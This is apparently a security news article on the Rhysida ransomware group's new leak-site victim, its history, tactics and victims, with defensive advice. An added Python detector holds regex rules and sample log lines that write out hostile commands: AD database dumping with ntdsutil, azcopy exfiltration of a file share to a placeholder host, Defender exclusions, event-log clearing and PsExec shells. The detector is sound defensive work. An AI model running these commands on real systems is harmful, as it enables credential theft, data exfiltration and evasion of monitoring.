RHYSIDA Ransomware Strikes Again: 'Leading Edge Speciali' Added to Leak Site as Group's Relentless Campaign Continues

The notorious ransomware group with ties to Vice Society claims another victim as security experts warn of accelerating attacks into 2026.


In the early morning hours of February 6, 2026, the RHYSIDA ransomware group updated their dark web leak site with a new victim: an organization identified only as "Leading Edge Speciali." The posting, first detected by ThreatMon's ransomware monitoring service at 00:11 UTC+3, marks yet another attack in what has become a relentless campaign by one of the most active and dangerous ransomware operations currently targeting organizations worldwide.

The attack bears the hallmarks of RHYSIDA's signature double-extortion model—steal the data first, then encrypt the systems, then threaten to publish everything unless the ransom is paid. For organizations across healthcare, education, government, and manufacturing sectors, this latest incident serves as an urgent reminder that RHYSIDA shows no signs of slowing down as we move deeper into 2026.

What We Know About the Victim

The victim name "Leading Edge Speciali" appears to be truncated on the dark web posting—likely shortened from "Leading Edge Specialists," "Leading Edge Specialties," or a similar full corporate name. This truncation is common on ransomware leak sites, which often have character limits or display issues that obscure victim identities.

Our research efforts to definitively identify the victim have not yet yielded conclusive results. Several organizations operate under "Leading Edge" branding across various industries:

  • Leading Edge Administrators — a healthcare benefits administrator
  • Leading Edge Medical — orthopedic solutions provider
  • Leading Edge Medical Associates — Texas-based emergency medicine group
  • Leading Edge Healthcare Professionals — practice management services
  • Leading Edge Security — Indiana-based security systems company
  • Leading Edge Technologies — IT staffing firm based in Minneapolis

Given RHYSIDA's well-documented preference for healthcare targets, organizations in that sector should be on heightened alert. However, without an official statement from the victim or additional information from the leak site, we cannot confirm the specific organization or industry affected.

What we can confirm: the leak site posting indicates this is a data-leak event, meaning RHYSIDA has exfiltrated data and is threatening publication. No ransom figures have been publicly disclosed, though the group typically operates on a countdown timer that gives victims days—not weeks—to respond before sensitive data goes public.

We will update this article as more information becomes available.

The RHYSIDA Threat: A Deep Dive

Origins and Evolution

RHYSIDA first emerged on the ransomware scene in May 2023, taking its name from a genus of centipedes—a fitting choice for a group whose attacks move quickly and strike with precision. The group operates primarily as a Ransomware-as-a-Service (RaaS) platform, meaning they develop and maintain the ransomware infrastructure while recruiting affiliates to actually conduct the attacks. This model has proven devastatingly effective, allowing RHYSIDA to scale operations rapidly while maintaining plausible deniability about specific attacks.

Security researchers have traced the group's likely origins to the Commonwealth of Independent States (CIS) region, a common haven for ransomware operations due to lax enforcement against cybercriminals who target Western organizations.

The Vice Society Connection

Perhaps the most significant aspect of RHYSIDA's emergence is its documented connection to Vice Society, another notorious ransomware group that terrorized the education and healthcare sectors throughout 2022 and 2023. Multiple security research teams—including Check Point, Sophos, and PRODAFT—have confirmed strong operational ties between the two groups.

The evidence is compelling:

  • Overlapping TTPs: The tactics, techniques, and procedures used by RHYSIDA operators closely mirror those employed by Vice Society.
  • Shared Infrastructure: Some attacks have shown affiliates using both Vice Society and RHYSIDA ransomware payloads.
  • Timing: Vice Society's relative disappearance from the scene corresponds directly with RHYSIDA's rise—suggesting a rebrand rather than a new group entirely.
  • Target Selection: Both groups have historically focused heavily on healthcare and education, sectors known for sensitive data and often-underfunded security programs.

This connection matters because it means RHYSIDA isn't a newcomer learning the ropes—they're experienced operators who have simply adopted a new name and updated toolset. The group benefits from years of accumulated knowledge about what works, which targets pay, and how to evade detection.

The RaaS Business Model

RHYSIDA operates on the increasingly common Ransomware-as-a-Service model. Here's how it works:

  1. Core Developers: The RHYSIDA team maintains the ransomware code, payment infrastructure, leak site, and negotiation operations.
  2. Affiliate Recruitment: They recruit affiliates—other cybercriminals—who actually conduct the attacks.
  3. Revenue Sharing: Affiliates typically keep 70-80% of any ransom payments, with the remaining 20-30% going to the core RHYSIDA operation.
  4. Support Services: The core team provides technical support, negotiation handling, and leak site management.

This model means that RHYSIDA attacks can vary significantly in sophistication depending on which affiliate conducts them. Some affiliates are highly skilled nation-state-level operators; others are relative novices. What unites them is access to RHYSIDA's proven toolkit and infrastructure.

The 2025-2026 Attack Pattern: No Sector Is Safe

RHYSIDA has been extraordinarily active over the past year, claiming victims across virtually every sector. The pattern reveals both opportunistic targeting and deliberate focus on high-value organizations.

Healthcare Under Siege

Healthcare remains RHYSIDA's primary hunting ground. Recent victims include:

  • Sunflower Medical Group (2025) — 220,968 individuals affected
  • MedStar Health (Maryland, 2025) — major healthcare system
  • Florida Hand Center (2025) — medical records, insurance forms, and IDs exposed
  • St. Joseph's Healthcare Hamilton (2025) — Canadian healthcare
  • Spindletop Center (Texas, 2025) — behavioral healthcare provider
  • Cytek Biosciences (2026) — healthcare/life sciences
  • Invacare — medical equipment manufacturer

The healthcare sector presents an irresistible target for ransomware groups. Protected Health Information (PHI) is extraordinarily valuable on underground markets. Critical patient care operations mean victims face life-or-death pressure to pay and restore systems quickly. HIPAA regulations add additional compliance pressure and potential liability. And frankly, many healthcare organizations have historically underfunded their cybersecurity programs relative to the sensitivity of the data they hold.

Government and Critical Infrastructure

RHYSIDA has shown no hesitation in attacking government entities and critical infrastructure:

  • City of Columbus, Ohio (2024) — Over 500,000 individuals affected, 3TB of data released, $1.7 million ransom demand (30 BTC)
  • Seattle-Tacoma International Airport (2024) — Critical transportation infrastructure
  • Maryland Department of Transportation (2025) — State government agency
  • Government of Peru — National government target

These attacks demonstrate RHYSIDA's willingness to take on high-profile targets despite the increased law enforcement attention such attacks generate.

Education Sector Carnage

Following the Vice Society playbook, RHYSIDA continues to target educational institutions:

  • Rutherford County Schools (Tennessee, 2024) — Student data compromised
  • Pembina Trails School Division (2024) — $1.6 million ransom demand for student data
  • Ranney School (2024)
  • Wachusett School District (2025)
  • Collège Supérieur de Montreal (2025-2026)
  • Multiple universities across North America and Europe

Schools and universities often have distributed IT environments, limited security budgets, and extremely sensitive student data—making them prime targets.

Other Notable Victims

RHYSIDA's reach extends across virtually every industry:

  • Insomniac Games (Sony, 2023) — Over 1TB leaked, including unreleased Marvel's Wolverine game details
  • British Library (2023) — Major cultural institution
  • Chilean Army (2023) — Military data breach
  • CNPC USA (China National Petroleum affiliate) — Energy sector
  • Elabs (Germany, 2026) — IT services

How RHYSIDA Operates: Technical Analysis

Understanding RHYSIDA's methods is essential for defense. Based on the April 2025 update to CISA Advisory AA23-319A and recent research from At-Bay and other security firms, here's how these attacks typically unfold.

Initial Access: The Entry Points

RHYSIDA affiliates gain initial access through several proven methods:

Compromised VPN Credentials: This remains the most common entry vector. Affiliates obtain valid VPN credentials through credential stuffing, dark web purchases, or phishing. Organizations without multi-factor authentication on VPN are especially vulnerable.

Gootloader Malware: Added to RHYSIDA's arsenal in 2025, Gootloader is delivered through SEO poisoning—malicious websites that rank highly for specific search terms and trick users into downloading trojanized software.

SEO Poisoning with Trojanized Downloads: Users searching for legitimate software like PuTTY find malicious downloads that install backdoors alongside (or instead of) the expected application.

Phishing Campaigns: Classic social engineering to harvest credentials or deliver initial payloads.

Unpatched External Systems: Exploiting known vulnerabilities in VPNs, email gateways, and other internet-facing systems.

Living Off the Land

Once inside, RHYSIDA affiliates prefer using built-in Windows tools to avoid detection:

  • Remote Desktop Protocol (RDP) for lateral movement between systems
  • PowerShell for script execution
  • Native Windows commands: ipconfig, whoami, nltest, net commands for reconnaissance
  • PsExec for remote command execution

The Toolbox

RHYSIDA affiliates deploy a range of commercial and open-source tools:

  • Cobalt Strike: post-exploitation framework for command and control
  • PsExec: remote execution across the network
  • AnyDesk: remote access and persistence
  • secretsdump: credential extraction from memory and files
  • ntdsutil.exe: dumping the Active Directory database
  • PowerView: domain reconnaissance
  • Advanced Port Scanner: network enumeration
  • AZCopy: Azure storage exfiltration
  • StorageExplorer: cloud storage access

The 2025 addition of AZCopy and StorageExplorer reflects a significant evolution in RHYSIDA's tactics. Rather than exfiltrating data to attacker-controlled infrastructure, affiliates are increasingly using legitimate cloud storage services—making detection far more difficult. In one observed case, attackers transferred over 100,000 files to Azure storage before detonating ransomware.

Covering Their Tracks

At-Bay's November 2025 research revealed sophisticated evasion scripts used by RHYSIDA affiliates:

Security Service Termination: Scripts that systematically disable and stop security-related services including SQL, Oracle, Exchange, Veeam backup, Malwarebytes, and Hyper-V services.

Process Killing: Targeted termination of security agents, backup tools, remote management software, antivirus processes, and database services.

Defensive Modifications: Adding Windows Defender exclusions for executable files, modifying registry settings, and clearing Windows event logs across System, Application, and Security categories.

Network Operations: Wake-on-LAN packets to bring offline systems online for encryption, and SMB share staging for tool deployment.

The Encryption Phase

When RHYSIDA deploys its ransomware:

  • Files are encrypted using a hybrid RSA + ChaCha20 algorithm
  • Encrypted files receive the .rhysida extension
  • A ransom note titled CriticalBreachDetected.pdf is dropped
  • Volume Shadow Copies are deleted to prevent easy recovery
  • Victims receive instructions to access a TOR-based payment portal with a unique identifier

Impact and Risk Assessment

The consequences of a RHYSIDA attack extend far beyond the immediate encryption event.

Operational Impact

Organizations face significant downtime as systems are encrypted and taken offline. For healthcare organizations, this can mean canceled procedures, diverted ambulances, and delayed care. For businesses, it means halted operations, missed deadlines, and broken supply chains.

Data Breach Consequences

The double-extortion model means data is exfiltrated before encryption. Victims face:

  • Regulatory Penalties: HIPAA violations for healthcare, state breach notification requirements, potential GDPR fines for organizations with EU data subjects
  • Litigation Risk: Class action lawsuits from affected individuals are increasingly common following ransomware attacks
  • Competitive Damage: Stolen intellectual property, trade secrets, and business communications may end up in competitors' hands or on public forums

Financial Toll

The costs compound rapidly:

  • Ransom Demands: RHYSIDA demands have ranged from hundreds of thousands to millions of dollars
  • Recovery Costs: Incident response, forensics, system rebuilding, and security improvements
  • Business Interruption: Lost revenue during downtime
  • Legal and Regulatory: Attorney fees, potential fines, notification costs
  • Long-term: Increased insurance premiums, reputation repair

Reputational Damage

Perhaps the most lasting impact is to organizational reputation. Customers, patients, partners, and the public lose trust. For healthcare organizations especially, that trust is the foundation of the care relationship.

What Organizations Should Do NOW

Whether your organization is in RHYSIDA's crosshairs or not, the time to act is before the attack—not after. Here are priority actions based on CISA guidance and observed RHYSIDA tactics.

Immediate Priorities

1. Enable Multi-Factor Authentication Everywhere

MFA on VPN, email, and all critical systems would prevent the majority of RHYSIDA attacks at the initial access stage. This is the single highest-impact control you can implement.

2. Patch Known Exploited Vulnerabilities

Review CISA's Known Exploited Vulnerabilities (KEV) catalog and prioritize patching any systems on that list. External-facing systems—VPNs, email gateways, web servers—should be first priority.

3. Segment Your Networks

Network segmentation limits lateral movement. Even if attackers breach one segment, they shouldn't have free rein across the entire environment.

4. Disable Unnecessary Remote Services

Audit and disable RDP, WMI, SMB, and other remote services where not required. Where required, restrict access to authorized users and systems only.

Detection and Monitoring

5. Monitor for Security Tool Tampering

Alert on Windows Defender being disabled or modified, security service termination, and attempts to add Defender exclusions.

6. Watch for Log Clearing

RHYSIDA affiliates routinely clear event logs to cover tracks. Alert on wevtutil.exe usage and gaps in log continuity.

7. Track Administrative Tool Usage

Unusual PsExec, RDP, or PowerShell activity—especially across multiple systems—may indicate lateral movement.

8. Monitor Cloud Egress

Watch for AZCopy, Azure Storage Explorer, or large data transfers to cloud storage services.

9. Protect Active Directory

Alert on NTDS.dit access attempts and unusual ntdsutil.exe usage.
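The detection items above (Defender exclusions, wevtutil log clearing, PsExec across hosts, AZCopy/Storage Explorer egress, ntdsutil/NTDS.dit access) can be turned into rules over process-creation telemetry. The following is an added example, not code from the article or any vendor: it assumes a simplified 'timestamp|host|user|parent|command' record layout, constructed sample records, assumed command syntaxes for each tool, and an assumed three-host threshold for the lateral-movement check.

```python
"""Added example (not code from the article or any vendor): detection logic
for the Rhysida indicators listed above, run over constructed process-creation
records in a simplified 'timestamp|host|user|parent|command' layout."""
import re
from collections import defaultdict

# Indicators (wevtutil, Defender exclusions, ntdsutil/NTDS.dit, AZCopy and
# Storage Explorer, PsExec) come from the article; the command syntaxes the
# regexes expect are assumed from each tool's normal usage.
RULES = {
    "log_clearing": re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I),
    "defender_exclusion": re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Extension|Process)", re.I),
    "ad_database_access": re.compile(r"\bntdsutil(\.exe)?\b|\bntds\.dit\b", re.I),
    "cloud_egress": re.compile(r"\b(azcopy(\.exe)?|StorageExplorer(\.exe)?)\b", re.I),
    "remote_exec": re.compile(r"\bpsexec(\.exe)?\b", re.I),
}
LATERAL_HOST_THRESHOLD = 3  # assumed: one account with flagged activity on 3+ hosts

# Constructed sample records; the account and host names are invented.
SAMPLE_LOG = r"""
2026-02-05T22:14:03Z|WS-0142|CORP\jdoe|explorer.exe|C:\Windows\System32\ipconfig.exe /all
2026-02-05T22:15:11Z|WS-0142|CORP\jdoe|cmd.exe|powershell -nop -c "Add-MpPreference -ExclusionPath C:\Temp"
2026-02-05T22:16:40Z|SRV-DC01|CORP\svc_backup|cmd.exe|ntdsutil.exe "ac i ntds" "ifm" "create full C:\Temp\ifm" q q
2026-02-05T22:20:05Z|SRV-FS02|CORP\svc_backup|cmd.exe|azcopy.exe copy D:\Shares\Finance https://constructed.invalid/c --recursive
2026-02-05T22:31:17Z|SRV-DC01|CORP\svc_backup|cmd.exe|wevtutil.exe cl Security
2026-02-05T22:31:18Z|SRV-DC01|CORP\svc_backup|cmd.exe|wevtutil.exe cl System
2026-02-05T22:40:00Z|WS-0207|CORP\svc_backup|cmd.exe|psexec.exe \\WS-0301 -s cmd.exe
"""

def analyse(log_text):
    """Return (hits, lateral). hits: list of (rule, host, user, command).
    lateral: accounts whose flagged activity spans too many hosts -> sorted hosts."""
    hits = []
    hosts_by_user = defaultdict(set)
    for line in log_text.strip().splitlines():
        fields = line.split("|", 4)
        if len(fields) != 5:
            continue  # malformed record: skip rather than crash the pipeline
        _ts, host, user, _parent, cmd = fields
        for name, rx in RULES.items():
            if rx.search(cmd):
                hits.append((name, host, user, cmd))
                hosts_by_user[user].add(host)
    lateral = {u: sorted(h) for u, h in hosts_by_user.items()
               if len(h) >= LATERAL_HOST_THRESHOLD}
    return hits, lateral

if __name__ == "__main__":
    hits, lateral = analyse(SAMPLE_LOG)
    for name, host, user, cmd in hits:
        print(f"[{name}] {host} {user}: {cmd}")
    for user, hosts in lateral.items():
        print(f"[lateral_movement] {user} on {len(hosts)} hosts: {', '.join(hosts)}")
```

On the sample records the account svc_backup trips the AD dump, cloud egress, log clearing and PsExec rules across three hosts, which is the multi-system pattern item 7 describes.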

Backup and Recovery

10. Maintain Offline Backups

Backups connected to your network will be encrypted or deleted. Maintain air-gapped backups that cannot be reached by ransomware.

11. Test Restoration Procedures

Backups are worthless if they don't restore. Regularly test your ability to recover critical systems from backup.

12. Plan for Domain Compromise

If NTDS.dit compromise is suspected, you'll need a domain-wide password reset plus a reset of the KRBTGT account password performed twice. Have this procedure documented and ready.

Looking Ahead: The Ransomware Landscape in 2026

RHYSIDA's continued activity into 2026 reflects the persistent, evolving nature of the ransomware threat. Despite law enforcement actions against other groups, despite improved defenses at many organizations, despite increased awareness—the ransomware economy continues to thrive.

The Vice Society-to-RHYSIDA evolution demonstrates how these groups adapt. When one brand becomes too hot, operators simply rebrand and continue operations. The underlying criminal ecosystem—the affiliates, the money launderers, the initial access brokers, the malware developers—persists through these transitions.

For defenders, this means the threat is perpetual. There is no "winning" against ransomware in a permanent sense. Instead, organizations must maintain continuous vigilance, assume breach as a planning scenario, and ensure they have the detection capabilities and backup infrastructure to survive an attack when—not if—it comes.

The addition of "Leading Edge Speciali" to RHYSIDA's leak site is a reminder that these attacks happen daily. Most never make headlines. Most victims quietly negotiate, pay, or rebuild. But each attack represents real harm to real organizations and the people they serve.


This is a developing story. We will update this article as more information about the victim and attack becomes available.

If you have information about this incident or RHYSIDA's operations, contact us securely through our tip line.

By Breached Company